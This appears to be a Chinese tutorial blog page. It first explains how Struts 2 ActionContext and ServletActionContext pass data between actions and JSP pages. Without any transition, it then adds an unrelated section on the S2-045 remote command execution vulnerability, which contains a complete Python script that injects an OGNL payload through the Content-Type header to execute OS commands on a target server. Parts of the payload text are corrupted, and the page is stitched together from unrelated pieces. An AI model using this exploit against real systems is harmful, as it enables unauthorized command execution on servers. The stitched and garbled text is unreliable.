Struts 2 ——ActionContext和ServletActionContext区别

本文深入探讨了ActionContext和ServletActionContext在MVC框架中的角色,阐述了它们如何在Action和JSP页面间实现数据传递,包括数据的存储和获取方法,以及如何通过EL表达式在前端显示数据。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、ActionContext

       顾名思义,ActionContext是Action执行时的上下文,实质为一个Map容器,用于存放Action在执行时需要用到request\response\session等对象,在action 和jsp间实现数据传递。可通过put,get方法可对ActionContext进行赋值取值操作;

       在实际使用中,经常出现Action和JSP页面间数据传递的操作;例如前台传给JSP用户基本信息;Action中将底层查到的数据存入session 或值栈中,前台通过JSTL标签和EL表达式,查找该数据的getset方法,获取Action中属性,从而将数据显示页面;

Action与页面传值:

       通过ActionContext容器中的值栈的set方法或是session的put方法,均可将Action中获得的数据存入,前台通过java特定的如EL表达式获取。

<span style="font-size:24px;">ActionContext.getContext().getValueStack().set("user",user);
ActionContext.getContext().getSession().put("user",user);</span>
前台:

<span style="font-size:24px;">用户名:<s:property value="user.username ">
性别:<s:property value="user.sex"></span>
注意:

1、user.username 应对应UserAction中getUsername方法,方才可获取用户名。因为java中面向对象的机制,所以对于某个Action类,均通过实例化对象后,通过get set方法获取或设定action属性值。

2、若Action将值存入session中时需要通过添加“#”获值,形如:value="#user.username“,而存入值栈中时则可直接user.username获取

二、ServletActionContext

ServletActionContext类直接继承了ActionContext,所以除了获取值栈、session对象之外,它还提供了直接与Servlet相关对象(request 和response)访问的功能。

<span style="font-size:24px;">ServletActionContext.getRequest().getSession().setAttribute("user",user);
ServletActionContext.getRequest().getSession().getAttribute(user);</span></span>
<span style="font-size:24px;">ServletActionContext.getContext().getValueStack().set("user",user);
ServletActionContext.getContext().getValueStack().push(user);</span>
注意:

ActionContext能够实现我们的功能,最好就不要使用ServletActionContext,尽量避免Action直接访问Servlet的对象,避免耦合度过高。

### 命令执行类漏洞概述 命令执行类漏洞是指攻击者能够通过某种方式向目标系统注入并运行任意操作系统命令的一类安全漏洞。这类漏洞通常发生在应用程序未对用户输入进行严格校验的情况下,使得恶意用户可以利用特定的语法结构绕过验证机制,最终实现非法操作系统的指令。 对于Web应用而言,常见的命令执行漏洞场景包括但不限于文件上传、动态参数解析以及外部接口调用等功能模块[^1]。 --- ### Struts2 远程命令执行漏洞基本概念及原理 #### 1. **Struts2 框架简介** Apache Struts2 是一种流行的Java Web开发框架,它提供了丰富的功能支持开发者构建复杂的交互式网站。然而,由于其设计复杂度较高,在某些情况下可能存在安全隐患,其中最典型的便是远程命令执行漏洞。 #### 2. **S2-045 (CVE-2017-5638) 漏洞分析** 此漏洞存在于使用 Jakarta 插件处理文件上传的过程中。当程序接收到 HTTP 请求时,如果 Content-Type 参数未经充分过滤,则可能允许攻击者构造特殊的 Payload 来触发 OGNL 表达式的求值行为,从而达到执行任意命令的目的[^2]。 具体来说,问题根源在于默认使用的 Multipart 解析器——`jakarta` 实现部分未能有效隔离用户可控数据与内部逻辑表达式之间的边界关系,致使后者可被前者污染而引发进一步危害[^4]。 #### 3. **技术细节说明** 以下是该类型缺陷的核心工作机制描述: - 攻击面定位:主要集中在服务器端接收客户端提交的数据包环节; - 利用条件判断:需满足版本范围内的受影响组件部署现状; - 执行流程追踪:从初始请求到达直至最终完成恶意脚本加载全过程记录; 例如下面给出了一段模拟测试环境下的 Python 脚本用于演示如何发送带有危险负载的消息给受害主机尝试获取反弹 shell连接效果展示[^3]: ```python import requests url = 'http://example.com/upload' payload = { 'Content-Type': '''%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@[email protected](\"Windows\")).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}''' } response = requests.post(url, headers=payload) print(response.text) ``` 上述代码片段展示了如何构造一个精心设计的内容类型字段以嵌入恶意OGNL语句,并试图让远端机器返回当前用户的标识信息作为响应的一部分。 --- ### 总结 综上所述,Struts2 的远程命令执行漏洞主要是因为不当的安全策略设置加上缺乏必要的输入净化措施所引起的重大风险事件之一。通过对这些案例的研究学习可以帮助我们更好地理解软件安全性的重要性及其防护手段的应用价值所在。 ---
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值